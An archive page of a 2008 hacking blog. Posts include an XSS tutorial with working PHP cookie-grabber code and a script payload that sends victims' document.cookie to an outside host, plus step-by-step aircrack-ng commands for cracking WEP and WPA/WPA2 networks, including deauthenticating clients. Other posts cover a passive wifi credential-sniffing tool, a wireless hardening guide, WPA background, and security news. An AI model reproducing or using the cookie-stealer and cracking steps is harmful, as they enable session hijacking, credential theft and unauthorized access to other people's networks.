break
May 15

Hi Friends Just i have started to learn XSS ,below is basic Tutorial by “XXx”

Tools used: Free hosting that support php
2 php pages
Vulnerable site.

Let’s work: First register a free hosting account. You can try on this sites: http://www.funpic.de ; http://www.altervista.org ; http://www.netsons.org

After all: registration and activation, we need to upload this 2 php pages on the site.
vb.php
PHP Code:
<head>
<meta http-equiv=”Content-Language” content=”it”>
<title>Cookies Stealther - Designed and programmed by R00t[ATI]</title>
</head>

<body bgcolor=”#C0C0C0″>

<p align=”center”><font color=”#FF0000″>COOKIES STEALTHER</font></p>
<p align=”center”><font face=”Arial” color=”#FF0000″>By R00T[ATI]</font></p>
<p align=”left”>&nbsp;</p>

</body>

documents.php
PHP Code:
<?php

$ip = $_SERVER[’REMOTE_ADDR’];
$referer = $_SERVER[’HTTP_REFERER’];
$agent = $_SERVER[’HTTP_USER_AGENT’];

$data = $_GET[c];

$time = date(”Y-m-d G:i:s A”);
$text = “<br><br>”.$time.” = “.$ip.”<br><br>User Agent: “.$agent.”<br>Referer: “.$referer.”<br>Session: “.$data.”<br><br><br>”;

$file = fopen(’vb.php’ , ‘a’);
fwrite($file,$text);
fclose($file);
header(”Location: http://www.google.com“);

?>
Vb.php file is used to SHOW at the attacker what cookies are grabbed and other information.
documents.php file is used to GRAB information at the victim like: ip address, user agent and naturally cookies.
Now, we need to find vulnerable site to Cross Site Scripting (XSS). After this insert a script that call documents.php that grab document cookie by using “c” method: documents.php?c=”+document.cookie;
For example:
Code:

http://vulnerable-site.com/vulnerable_page.php?vulnerable_method=<script>docume

nt.location=”http://syshack.sy.funpic.de/documents.php?c=“+document.cookie;</script>

Victim will be redirected to http://www.google.com (edit it in documents.php). And the attacker can be see victim cookies on vb.php

Date May 15th, 2008 Filed in Uncategorized No Comments »
May 12

WifiZoo is a tool to gather wifi information passively. It is created to be helpful in wifi pentesting and was inspired by ‘Ferret‘ from Errata Security.

The tool is intended to get all possible info from open wifi networks (and possibly encrypted also in the future, at least with WEP) without joining any network, and covering all wifi channels.

WifiZoo does the following:

-gathers bssid->ssid information from beacons and probe responses *(now the graph contains the ssid of the bssid :), new in v1.1)*
-gathers list of unique SSIDS found on probe requests (you can keep track of all SSIDS machines around you are probing for, and use this information on further attacks)*new in v1.1*
-gathers the list and graphs which SSIDS are being probed from what sources *new in v1.1*
-gathers bssid->clients information and outputs it in a file that you can later use with graphviz and get a graph with “802.11 bssids->clients”. It gathers both src and dst addresses of packets to make the list of clients so sometimes you get weird graphs that are fun to analyze :) (basically, because I still need to omit multicast dst addresses and things like that). Using the dst address means that sometimes you get mac addresses of wifi devices that are not near you, but I think gives you information about the wifi ‘infrastructure’, again, I think :).
-gathers ‘useful’ information from unencrypted wifi traffic (ala Ferret,and dsniff, etc); like pop3 credentials, smtp traffic, http cookies/authinfo, msn messages,ftp credentials, telnet network traffic, nbt, etc.
-and I think that’s it.

and remember.. WifiZoo is work in progress…

Channel Hopping

WifiZoo just listens on a wifi interface and will not do channel hopping by itself (this is sthg inside the huge TODO list the tool has). right now, I do channel hopping using Kismet, weird perhaps, but it works:

-Configure Kismet to do channel hopping
-run kismet
-run wifizoo and wait

For example, you can customize how Kismet does channel hopping thru the kismet.conf file by modifying the following options:

channelhop
channelvelocity
channeldwell
defaultchannels
sourcechannels

you can confIgure how much time to spend on each channel, which channels to hop thru, etc.

What do you need to run WifiZoo?

-python
-scapy
-kismet if you want to do channel hopping (although you can probably come up with a script instead of installing kismet just to do channel hopping)
-logs are stored in ./logs/, make sure this directory is created before running the tool :).

TODO

Mmm, lots of things TODO. you’ll notice.

Wifi bssids->clients graphs

This is perhaps the most fun, because everyone loves graphs, right?. The bssid->clients file is stored in ./logs/clients.log, to generate the graph do:

dot -Tpng -oclients.png clients.log

clients.png will be the file with the graph.

You can download WifiZoo v1.3 here:

wifizoo_v1.3.tgz

Date May 12th, 2008 Filed in Uncategorized No Comments »
May 9

NetStumbler
Netstumbler also famously known as Network Stumbleris a good tool which acilitates dedecting of Wireless Lans using the 802.11b, 802.11a and 802.11g WLAN standards it runs on microsoft OS from Win98 - Win Vista, there is anothere version called Mini Stumbler which is available for the handheld Windows CE operating System.
you can get it here

Aircrack
The fastest available WEP/WPA cracking tool
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).
you can get Aircrackhere

Airsnort
802.11 WEP Encryption Cracking Tool
AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It was developed by the Shmoo Group and operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. You may also be interested in the similar Aircrack.
you can get AirSnort here

Cowpatty
This Cowpatty is good brute force tool for cracking WPA-PSK, considered the “New WEP” for home Wireless Security. This program simply tries a bunch of different options from a dictionary file to see if one ends up matching what is defined as the Pre-Shared Key.
you can get Cowpatty here

Asleap
This Tool is really good for when the network is using Leap. this tool can be used to gather the authentication data that is being passed across the network, and these sniffed credentials can be cracked. LEAP doesn’t protect the authentication like other “real” EAP types, which is the main reason why LEAP can be broken
you can get LEAP here

Ethereal
Ethereal is used by all around the world by both Wind0s and opensource Operating system, its used for troubleshooting, analysis, software and protocol development, and education. It has all of the standard features you would expect in a protocol analyzer, and several features not seen in any other product. Its open source license allows talented experts in the networking community to add enhancements
you can download Ethereal here

by Ne0

Date May 9th, 2008 Filed in Wifi hacking No Comments »
May 7

Hi Friends This Is my 2nd Tutorial ,Today i will be Teaching u how to Crack a Wireless WPA / WPA2 TKIP or TKIP+AES Network using Ubuntu 7.10
whats the Difference Between cracking a WPA network and WPA2 network,Nothing !! There is no difference between cracking a WPA or WPA2
networks at all.In order to sucessfully crack any WPA/WPA2 network,there are 2 main things must happen
1) U must capture the Full 4 Way Handshake.
2) Your Passphrase must be in the DICTIONARY you choose in order to sucessfully BruteForce.
We will be using the aircrack-ng suite of tools and a small dictionary file on Ubuntu.

There are a few ways to crack a WPA / WPA2 PSK password this is just one of them.

This method is usally vunerable because of the end user, as most people will use a pass phrase thats easy to remember.
bcz evry body doesnt want to keep long password.

You will need the following details

A Client connected to the AP to Deauth
ESSID = this is the Name of your wireless network i.e MYWIRELESS
BSSID = this is the MAC address of your AP and will be in this format 00:1C:10:26:A9:39 everyone’s is different so make sure you write it down correctly or the following will not work
Channel = This will be the channel your AP is Broadcasting on i.e channel 7
ALSO you will need a decent dictionary file you can find many of these around on the internet google is your friend on this one,

then lets start

below are the Steps

Step 1 - Start the wireless interface in monitor mode

Airmon-ng strat wifi0 (starts ur Interface with Monitor mode)
Airodump-ng ath0 (Monitors the Access point available)

Step 2 - Start airodump-ng to collect authentication handshake

Airodump-ng -c 11 -w psk –bssid 00:1C:10:26:A9:39 ath0

Where:

-c 11 is the channel for the wireless network

- -bssid 00:1C:10:26:A9:39 is the access point MAC address. This eliminate extraneous traffic.

-w psk is the file name prefix for the file which will contain the IVs.

ath0 is the interface name.

Important: Do NOT use the ”- -ivs” option. You must capture the full packets.

Step 3 - Use aireplay-ng to deauthenticate the wireless client

aireplay-ng -0 3 -a 00:1C:10:26:A9:39 -c 00:0F:B5:EC:99:6F ath0

Where:

-0 means deauthentication

3 is the number of deauths to send (you can send muliple if you wish)

-a 00:1C:10:26:A9:39 is the MAC address of the access point

-c 00:0F:B5:EC:99:6F is the MAC address of the client you are deauthing

ath0 is the interface name

Step 4 - Run aircrack-ng to crack the pre-shared key

aircrack-ng -w dictionary.txt -b 00:1C:10:26:A9:39 psk*.cap

Where:

-w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.

*.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.

Done now wait for some time It depends upon ur Dictionary file and the passphrase ,

You should now have your PSK passphrase

&<>evilmonkey000<>&

Nothing is Impossible All kind of phassphrasses can be cracked until there is a patch for Human stupidity Bcz now there is no Patch for Human stupidity.

and u can also see my Video below

http://s288.photobucket.com/albums/ll167/3vilmonkey1983/?action=view&current=WPAandWPA2Cracking1.flv

comming soon Next Tutorial on Cracking WPA/WPA2 With Airolib-ng Database for Fast Cracking with Huge Dictionary

Tutorial by
(Wireless Punter)

Date May 7th, 2008 Filed in Uncategorized 2 Comments »
May 4
Keeping your wireless network secure

Here are a few steps to keep your AP secure.
Remember nothing is unbreakable

1) Secure your wireless router or access point administration interface

Almost all routers and access points have an administrator password that’s needed to log into the device and modify any configuration settings. Most devices use a weak default password like “password” or the manufacturer’s name, and some don’t have a default password at all. As soon as you set up a new WLAN router or access point, your first step should be to change the default password to something else. You may not use this password very often, so be sure to write it down in a safe place so you can refer to it if needed. Without it, the only way to access the router or access point may be to reset it to factory default settings which will wipe away any configuration changes you’ve made.

2) Don’t broadcast your SSID

Most WLAN access points and routers automatically (and continually) broadcast the network’s name, or SSID (Service Set IDentifier). This makes setting up wireless clients extremely convenient since you can locate a WLAN without having to know what it’s called, but it will also make your WLAN visible to any wireless systems within range of it. Turning off SSID broadcast for your network makes it invisible to your neighbors and passers-by (though it will still be detectible by WLAN “sniffers like kismet”).

3)Enable WPA/WPA2 encryption instead of WEP

802.11’s WEP (Wired Equivalency Privacy) encryption has well-known weaknesses that make it relatively easy for a determined user with the right equipment to crack the encryption and access the wireless network. A better way to protect your WLAN is with WPA (Wi-Fi Protected Access). WPA provides much better protection and is also easier to use, since your password characters aren’t limited to 0-9 and A-F as they are with WEP. WPA support is built into Windows XP (with the latest Service Pack) and virtually all modern wireless hardware and operating systems. A more recent version, WPA2, is found in newer hardware and provides even stronger encryption, but you’ll probably need to download an XP patch in order to use it.

4) Remember that WEP is better than nothing

If you find that some of your wireless devices only support WEP encryption (this is often the case with non-PC devices like media players, PDAs, and DVRs), avoid the temptation to skip encryption entirely because in spite of it’s flaws, using WEP is still far superior to having no encryption at all. If you do use WEP, don’t use an encryption key that’s easy to guess like a string of the same or consecutive numbers. Also, although it can be a pain, WEP users should change encryption keys often– preferably every week.

5) Use MAC filtering for access control

Unlike IP addresses, MAC addresses are unique to specific network adapters, so by turning on MAC filtering you can limit network access to only your systems (or those you know about). In order to use MAC filtering you need to find (and enter into the router or AP) the 12-character MAC address of every system that will connect to the network, so it can be inconvenient to set up, especially if you have a lot of wireless clients or if your clients change a lot. MAC addresses can be “spoofed” (imitated) by a knowledgable person, so while it’s not a guarantee of security, it does add another hurdle for potential intruders to jump.
6) Reduce your WLAN transmitter power
You won’t find this feature on all wireless routers and access points, but some allow you lower the power of your WLAN transmitter and thus reduce the range of the signal. Although it’s usually impossible to fine-tune a signal so precisely that it won’t leak outside your home or business, with some trial-and-error you can often limit how far outside your premises the signal reaches, minimizing the opportunity for outsiders to access your WLAN.

7) Disable remote administration

Most WLAN routers have the ability to be remotely administered via the Internet. Ideally, you should use this feature only if it lets you define a specific IP address or limited range of addresses that will be able to access the router. Otherwise, almost anyone anywhere could potentially find and access your router. As a rule, unless you absolutely need this capability, it’s best to keep remote administration turned off. (It’s usually turned off by default, but it’s always a good idea to check.)

There are many other things you can do but this should get you started.

Date May 4th, 2008 Filed in Uncategorized No Comments »
May 2

Hi Friends today i will be telling about WPA and WPA2 ,

Wi-Fi Protected Access (WPA and WPA2) is a class of systems to secure wireless (Wi-Fi) computer networks. It was created in response to several serious weaknesses researchers had found in the previous system, Wired Equivalent Privacy (WEP).

WPA implements the majority of the IEEE 802.11i standard, and was intended as an intermediate measure to take the place of WEP while 802.11i was prepared. WPA is specifically designed to also work with pre-WPA wireless network interface cards (through firmware upgrades), but not necessarily with first generation wireless access points. WPA2 implements the full standard, but will not work with some older network cards.

WPA2 implements the mandatory elements of 802.11i. In particular, it introduces a new AES-based algorithm, CCMP, that is considered fully secure. From March 13, 2006, WPA2 certification is mandatory for all new devices wishing to be Wi-Fi certified.

Security in pre-shared key mode

Pre-shared key mode (PSK, also known as personal mode) is designed for home and small office networks that don’t require the complexity of an 802.1X authentication server. Each user must enter a passphrase to access the network. The passphrase may be from 8 to 63 printable ASCII characters or 64 hexadecimal digits (256 bits).[2] If you choose to use the ASCII characters, a hash function reduces it from 504 bits (63 characters * 8 bits/character) to 256 bits (using also the SSID). The passphrase may be stored on the user’s computer at their discretion under most operating systems to avoid re-entry. The passphrase must remain stored in the Wi-Fi access point.
Security is strengthened by employing a PBKDF2 key derivation function. However, the weak passphrases users typically employ are vulnerable to password cracking attacks. To protect against a brute force attack, a truly random passphrase of at least 20 characters should be used, and 33 characters or more is recommended.[3]
Some consumer chip manufacturers have attempted to bypass weak passphrase choice by adding a method of automatically generating and distributing strong keys through a software or hardware interface that uses an external method of adding a new Wi-Fi adapter or appliance to a network. These methods include pushing a button (Broadcom SecureEasySetup[4] and Buffalo AirStation One-Touch Secure System) and entering a short challenge phrase through software (Atheros JumpStart[5]). The Wi-Fi Alliance has standardized these methods in a program called Wi-Fi Protected Setup (formerly Simple Config).

EAP extensions under WPA- and WPA2- Enterprise

The Wi-Fi alliance has announced the inclusion of additional EAP (Extensible Authentication Protocol) types to its certification programs for WPA- and WPA2- Enterprise. This was to ensure that WPA-Enterprise certified products can interoperate with one another. Previously, only EAP-TLS (Transport Layer Security) was certified by the Wi-Fi alliance.
The EAP types now included in the certification program are:
EAP-TLS (previously tested)
EAP-TTLS/MSCHAPv2
PEAPv0/EAP-MSCHAPv2
PEAPv1/EAP-GTC
EAP-SIM

Other EAP types may be supported by 802.1X clients and servers developed by specific firms. This certification is an attempt for popular EAP types to interoperate; their failure to do so is currently one of the major issues preventing rollout of 802.1X on heterogeneous networks

Date May 2nd, 2008 Filed in Uncategorized 1 Comment »
May 1

Hi friends Welcome to the World of Packets,Welcome stranger,you are Entering the land of packets,bruteforce and misuse of trust,This is a dark land.Full of problems and choices .Be carefull when you use your Knowledge.Be also carefull with your weapons,never understimate your enemey

This is my First Tutorial so please let me know if ur not able to Understand ,Suggestions can only make every thing perfect.

Today i will be Teaching u how to Crack a Wireless WEP key in 10 easy steps using Aircrack-ng tools in ubuntu 7.10

below are the Commands

1)sudo airmon-ng start wifi0 (start ur wifi card to monitor mode)
2)sudo wlanconfig ath0 destroy
3)sudo ifconfig ath1 up (makes ur ath1 interface up)
4)sudo iwconfig ath1 mode monitor channel 11 (makes ath1 to set in monitor mode in channel 11)
5)sudo aireplay-ng -1 0 -e linksys -a 00:1C:10:26:A9:39 -h 00:18:4D:6E:54:79 ath1 ( Sending Authentication Request)
6)sudo aireplay-ng -5 -b 00:1C:10:26:A9:39 -h 00:18:4D:6E:54:79 ath1 (fragmentation attack)
7)packetforge-ng -0 -a 00:1C:10:26:A9:39 -h 00:18:4D:6E:54:79 -k 255.255.255.255 -l 255.255.255.255 -y ur xor file.xor -w arp-request (generate an arp packet)
8)sudo airodump-ng -c 11 –bssid 00:1C:10:26:A9:39 -w capture ath1 (monitors the AP)
9)sudo aireplay-ng -2 -r arp-request ath1 (sending the Arp-request with use interactive frame selection)
10)sudo aircrack-ng -z *.cap (capture*.cap selects all dump files starting with “capture” and ending in “cap”.) “-z ptw attack

and below is the link for the video

http://s287.photobucket.com/albums/ll135/ngmanju/?action=view&current=LatestWEPcrackingEnglish1.flv (Good quality)
(English version)
(kannada version)

Tutorial by

(Wireless Punter)

BackTrack 3

Ubuntu 7.10

Next Tutorial on Cracking WPA with AES Encryption (comming soon faster than u think)

Date May 1st, 2008 Filed in Uncategorized 2 Comments »
Apr 7

Tech-savvy teens and tweens are often looked upon with a measurable amount of contempt, so much so that the image of the bored, listless, and ultimately despondent young person maliciously hacking for the simple thrill of it has become a modern archetype. Yet, as The Who once remarked, the kids are alright.

Jon Penn, a sixth grader at a small private school in Sherwood, Ark., is Exhibit A. When Victory Baptist School’s previous network admin jumped ship, 11-year-old Jon decided to help out his mother, the school librarian who suddenly found herself responsible for computer support, by taking the reins.

His school needed a gateway to protect against attacks, filter viruses and spam, and block inappropriate sites. Keeping costs down is important since the school is operating on a shoestring budget to keep its 60 aging computers, a donation from years ago, working for the roughly 200 students permitted to use them, along with the teachers. 

Jon set to removing viruses from the antiquated machines and installed a firewall and filtering software as a stopgap measure while he looked forward to instituting centralized system management. Along the way he became what may well be the nation’s youngest IT guy, and what’s very obviously any geek parent’s dream come true.  

via wiredblog

Date April 7th, 2008 Filed in ITsec News No Comments »
Apr 3

In the Field of IT security Breaches, wifi hacking is an illegal way of penentration of wifi Network, A wifi network can be penetrated in a number of ways. There are methods ranging from those that demand a high level of technological skill and commitment to methods that are less sophisticated and require minimal technologically skill. Once within a network a skilled hacker can modify software, network settings, other security items and much more. To counter the security threat of an intrusion into a wireless network, there are many precautions available.

Virtual Intrusion

The various methods used by hacker that enable them to exploit wireless connections typically begin with eavesdropping on a network, “sniffing”. A packet sniffer is a program that monitors that information contained on a network. The information that sniffer programs make available include emails, user names and passwords, among other sensitive information. There are different means of sniffing out wireless networks including passively scanning and collecting Media Access Control (MAC) addresses.

A hacker can passively scan each radio channel that wireless networks are broadcast on to check for activity. By passively scanning the presence of that scanner is not revealed since they are not actually transmitting any traceable material to the network at this point.

Detecting a wireless “sniffer” is extremely difficult. It is only after the hacker starts to probe and/or install packets onto the network that the location of the attacker and/or the device can be isolated. For some hackers the main goal of an intrusion is to obtain the WEP key. There are several methods that are used to achieve this. The main obstacle to intruders gaining the WEP key is a lack of computing power. The average home computer could take anywhere from hours to days to gain access through weak system frames.

The information that a hacker can collect from sniffing alone is limited, in order to gain all the information that they want hackers must then engage in actively probing a network. In actively probing a network a hacker increases the probably of detection. This risk comes as a result of the packets that are sent to the target in an effort to get back the desired information in return.

War Driving is another increasingly common method of gaining access to unprotected networks. The main equipment for war driving includes a WiFi enabled laptop or PDA, a GPS device.

Other Means of Gaining Access

Other means available and use by hackers to gain access to a wireless network include virtually probing, lost password and social spying. These methods are not as technologically intensive as virtual intrusions but they nonetheless pose a high security threat.

  • A virtual probe is when hackers contact users on a network on the pretence of being a vendor that a company normally deals with. The hacker than asks for sensitive information concerning the wireless network. A commonly used example of this is when a hacker pretends to be conducting a survey. They then ask for information about the firewalls, or many other sensitive pieces of information.
  • The lost password method of intrusion is when the hacker obtains a password to get past an organizations firewall or intrusion detection system. Then the hacker will develop an account for himself so they can access any information they want at any time they want.
  • The social spying method of intrusion is when hackers spy on everyday people when they are entering passwords. The person targeted does not know that they are the target of the hacker. An example of this is when people enter their PIN while at the ATM, very few take the precaution of protecting this important information.

Security Measures

In an effort to protect a wireless network there are several security measures that can be employed.

  • Encryption of all wireless traffic is the most secure way of reducing both hacking attempts, and successful breaches. There are several wireless encryption types available, including WEP, WPA and WPAv2. WEP is considered insecure, as given enough processing power, it can be broken. That said, WEP will still stop any passive scans, as well as casual hackers.
  • Altering the network from the manufacturer’s defaults can also discourage hackers. The information about network defaults is easily accessible and will render any security enhancements useless. Settings such as default SSID, default admin password, and disabled encryption are the main items that need addressing.
  • Data, especially passwords, should be encrypted when travelling over the network. A cracked system without encrypted passwords and other information is totally accessible to hackers.
  • As with most technology updating security protocols and other information is crucial to maintaining the security of the system.

It is a common misconception that disabling broadcasting of the SSID and enabling MAC filtering is a sufficient security configuration. This is not the case. Disabling the SSID broadcast merely prevents casual nearby wireless users from detecting the presence of your network - war drivers and those who are already aware of your wireless network will not be disadvantaged at all by a disabled SSID. Similarly, MAC address filtering will only prevent accidental connection from casual users - MAC address’s can be spoofed to appear to be that of an authorised workstation or laptop.

Sources

Wireless Security
Easily secure your wireless network Free software - get it now!
www.NetworkMagic.com

Wireless Networking
Secure Wireless Solutions RF Site Surveys & Installations
www.AdvancedMobileGroup.com

Wi-Fi Spectrum Analyzer
Low cost packages ($89.95 - $395) -Test & optimize wireless networks
www.NutsAboutNets.com

Date April 3rd, 2008 Filed in Wifi hacking 2 Comments »
Apr 1

DanDan Egerstad, man behind controversial “hack of the year 2007″ was taken for questioning by Swedish National Crime and Swedish Security Police few days ago, The Age informed. Also his house was raided and police took his computers and hard drives. Anyway no charges have been set.Egerstad published in August this year usernames and passwords to email accounts from embassies and governments from different countries. As he explained, he created exit TOR nodes and intercepted traffic and on such way he obtained these informations. What is maybe worser, logins acquired on this way were according to him not used by legit users but actual malicious people that compromise these accounts and tried to hide in TOR network when using them. Many would say this is unethical approach, but what is here more important: ethics or security (and in this case it applies maybe to world-wide security)?

So he turned to notifying affected governments, because if contacting Swedish authorities there was a risk, that his experiment could be misused by intelligence services. Except few calls from Swedish security police the only serious response was from Iran. As he said, “they wanted to know everything i knew”.These are facts that create different points of view.1. Those who used TOR for communicating sensitive informations probably didn’t read carefully it’s homepage and all the warnings included. Building secure communication channels in government environments should be mandatory, but use TOR for this… excuse me, please, this is stupid.2. Please note the fact, that most of the accounts were already used by malicious people - Egerstad discovered only top of iceberg.3. Even he has intercepted traffic on exit node, and this is from ethical point of view something unacceptable, he didn’t misused it and selected the best solution he could - informing governments of affected countries - and this could be considered as ethical approach. The fact, that except Iran nobody seriously investigated this issue. What a shame for more developed countries!

4. He posted account informations to public - another controversial move from ethical point of view. But, let me place here question: if you give out informations for free to governments and become not even “thank you”, what will you do?

5. Egerstad showed only, than anybody can do the same - and have the same informations as he got, with no special and expensive intelligence. And because he published the details, lot of intelligence agencies may become angry.

Now, let me please repeat one of my examples: if you forget to lock your car, it can be stolen and that would be your fault, but if your neighbor tells you, that you forgot to lock that car, who becomes most angry? Usually, a thief…

Date April 1st, 2008 Filed in ITsec News 1 Comment »

« Previous Entries